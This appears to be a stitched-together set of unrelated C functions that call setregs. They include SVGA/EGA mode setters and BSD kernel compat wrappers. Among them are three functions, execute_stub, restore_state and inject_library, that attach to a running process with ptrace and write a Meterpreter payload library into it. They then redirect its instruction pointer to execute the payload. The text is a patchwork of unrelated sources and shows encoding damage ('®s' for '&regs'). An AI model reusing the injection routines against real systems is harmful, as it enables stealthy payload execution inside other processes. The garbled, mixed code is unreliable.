static int setmode(int mode, int prv_mode)
{
unsigned char *moderegs;
ModeTiming *modetiming;
ModeInfo *modeinfo;
int i;
if (!modeavailable(mode))
return 1;
modeinfo = __svgalib_createModeInfoStructureForSvgalibMode(mode);
modetiming = malloc(sizeof(ModeTiming));
if (__svgalib_getmodetiming(modetiming, modeinfo, cardspecs)) {
free(modetiming);
free(modeinfo);
return 1;
}
moderegs = malloc(TOTAL_REGS);
initializemode(moderegs, modetiming, modeinfo, mode);
free(modetiming);
__svgalib_setregs(moderegs); /* Set standard regs. */
setregs(moderegs, mode); /* Set extended regs. */
free(moderegs);
free(modeinfo);
return 0;
}
/*!
* @brief Executes an stub of code on a debugged process.
* @param pid Process identifier where to execute code.
* @param addr Process addr to store the code.
* @param stub Pointer to code stub to execute.
* @param stub_size ptrace friendly length of the stub to execute.
* @returns Indication of success or failure.
* @retval 0 indicates success.
*/
LONG
execute_stub(LONG pid, unsigned long addr, unsigned long *stub, ULONG stub_size) {
LONG i = 0;
LONG result = 0;
struct user_regs_struct stub_regs;
if (stub_size == 0 || stub == NULL)
return ERROR_INVALID_PARAMETER;
result = write_memory(pid, addr, stub, stub_size);
if (result != 0)
return result;
// Jump into the nops stub, makes code modification
// more reliable.
result = getregs(pid, &stub_regs);
if (result != 0)
return result;
dprintf("[EXECUTE_STUB] Original EIP 0x%x", stub_regs.eip);
stub_regs.eip = stub_regs.eip + 8;
result = setregs(pid, &stub_regs);
if (result != 0)
return result;
dprintf("[EXECUTE_STUB] Redirecting to 0x%x", stub_regs.eip);
result = cont(pid);
if (result != 0)
return result;
return 0;
}
/*!
* @brief Restores the process state and detaches.
* @param pid Process identifier to restore.
* @param s Pointer to \c state with code and registers.
* @param only_memory Idicates if restore only memory at EIP or also registers
* @returns Indication of success or failure.
* @retval 0 Indicates success.
*/
LONG
restore_state(LONG pid, state *s, int only_memory) {
unsigned long *mem_ptr = NULL;
LONG i = 0;
LONG result = 0;
if (s == NULL)
return ERROR_INVALID_PARAMETER;
mem_ptr = (unsigned long *)(s->memory);
if (mem_ptr == NULL)
return ERROR_INVALID_PARAMETER;
result = write_memory(pid, s->regs.eip, mem_ptr, MMAP_STUB_SIZE);
if (result != 0)
return result;
if (only_memory > 0)
return 0;
result = setregs(pid, &(s->regs));
if (result != 0)
return result;
result = detach(pid);
if (result != 0)
return result;
return 0;
}
void
freebsd_setregs(struct lwp *l, struct exec_package *epp, vaddr_t stack)
{
struct pcb *pcb = lwp_getpcb(l);
setregs(l, epp, stack);
if (i386_use_fxsave)
pcb->pcb_savefpu.sv_xmm.sv_env.en_cw = __FreeBSD_NPXCW__;
else
pcb->pcb_savefpu.sv_87.sv_env.en_cw = __FreeBSD_NPXCW__;
}
static int setmode(int mode, int prv_mode)
/* standard EGA driver: setmode */
{
const unsigned char *regs;
regs = LOOKUPMODE(ega_modes, mode);
if (regs == NULL || regs == DISABLE_MODE)
return 1;
lastmode = mode;
setregs(regs, mode);
return 0;
}
void
linux_setregs(struct lwp *l, struct exec_package *epp, vaddr_t stack)
{
#ifdef DEBUG
struct trapframe *tfp = l->l_md.md_tf;
#endif
setregs(l, epp, stack);
#ifdef DEBUG
/*
* Linux has registers set to zero on entry; for DEBUG kernels
* the alpha setregs() fills registers with 0xbabefacedeadbeef.
*/
memset(tfp->tf_regs, 0, FRAME_SIZE * sizeof tfp->tf_regs[0]);
#endif
}
/*
* Set set up registers on exec.
* XXX not used at the moment since in sys/kern/exec_conf, LINUX_COMPAT
* entry uses NetBSD's native setregs instead of linux_setregs
*/
void
linux_setregs(struct lwp *l, struct exec_package *pack, u_long stack)
{
setregs(l, pack, stack);
}
/*!
* @brief Injects meterpreter stage library in a process.
* @param pid Process identifier to inject.
* @param l Pointer to the \c library to inject.
* @returns Indication of success or failure.
* @retval 0 indicates success.
*/
LONG
inject_library(LONG pid, library *l) {
state s;
long code_mem;
long stack_mem;
struct user_regs_struct regs;
ULONG library_size = _SIZE_OF(l->length);
unsigned long *buf_ptr = (unsigned long *)l->data;
LONG result = 0;
if (l == NULL) {
result = ERROR_INVALID_PARAMETER;
goto end;
}
dprintf("[INJECT] Saving state");
result = attach(pid);
if (result != 0)
goto end;
result = save_state(pid, &s);
if (result != 0)
goto end;
memcpy(®s, &(s.regs), sizeof(struct user_regs_struct));
dprintf("[INJECT] Creating new code memory");
result = allocate(pid, ®s, 0, CODE_SIZE);
dprintf("[DEBUG] result: %d", result);
if (result != 0)
goto restore;
dprintf("[INJECT] New code memory on 0x%x, fixing registers", regs.eax);
code_mem = regs.eax;
regs.eip = code_mem;
result = setregs(pid, ®s);
if (result != 0)
goto restore;
dprintf("[INJECT] Restoring code on original process");
restore_state(pid, &s, 1);
dprintf("[INJECT] Creating new stack");
result = allocate(pid, ®s, 0, STACK_SIZE);
if (result != 0)
goto restore;
dprintf("[INJECT] New stack on 0x%x, fixing registers", regs.eax);
stack_mem = regs.eax + STACK_SIZE;
regs.esp = stack_mem;
regs.eip = code_mem;
result = setregs(pid, ®s);
if (result != 0)
goto restore;
dprintf("[INJECT] Allocating space for the library...");
result = allocate(pid, ®s, l->base_addr, l->length);
if (result != 0)
goto restore;
if (regs.eax != l->base_addr) {
result = EFAULT;
goto restore;
}
dprintf("[INJECT] Copying payload to 0x%x", regs.eax);
result = write_memory(pid, regs.eax, buf_ptr, library_size);
if (result != 0)
goto restore;
dprintf("[INJECT] Fixing registers");
regs.esp = stack_mem;
regs.eip = code_mem;
result = setregs(pid, ®s);
if (result != 0)
goto restore;
dprintf("[INJECT] Executing call stub");
result = call(pid, ®s, l->entry_point);
if (result != 0)
goto restore;
dprintf("[INJECT] The payload has warned successfully, migration has been successfully");
result = detach(pid);
goto end;
restore:
restore_state(pid, &s, 0);
end:
return result;
}
/*
* Set set up registers on exec.
*/
void
linux_setregs(struct lwp *l, struct exec_package *pack, vaddr_t stack)
{
setregs(l, pack, stack);
}
void
netbsd32_setregs(struct lwp *l, struct exec_package *pack, vaddr_t stack)
{
l->l_proc->p_flag |= PK_32;
setregs(l, pack, stack);
}
